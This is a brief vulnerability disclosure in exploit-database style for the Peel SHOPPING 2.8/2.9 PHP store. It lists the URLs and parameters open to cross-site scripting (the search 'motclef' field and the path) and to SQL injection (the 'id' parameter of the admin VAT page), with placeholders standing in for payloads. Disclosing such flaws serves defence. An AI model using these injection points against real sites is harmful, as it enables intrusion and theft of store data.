+-------------------------------------------------------------------------+# Exploit Title : Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability# version : v2.9# Author: Cyber-Crystal # Date: n/a# Software Link : http://www.peel.fr/ || or http://www.easy-script.com/scripts-PHP/peel-v29-4308.html+-------------------------------------------------------------------------+[+] Exploits
http://localhost/peel/index.php/achat/recherche.php?motclef=[Xss Here ]&action=Rechercher
http://localhost/peel/administrer/tva.php?mode=modif&id=[SQL]
http://localhost/peel/index.php/[XSS]# The End //
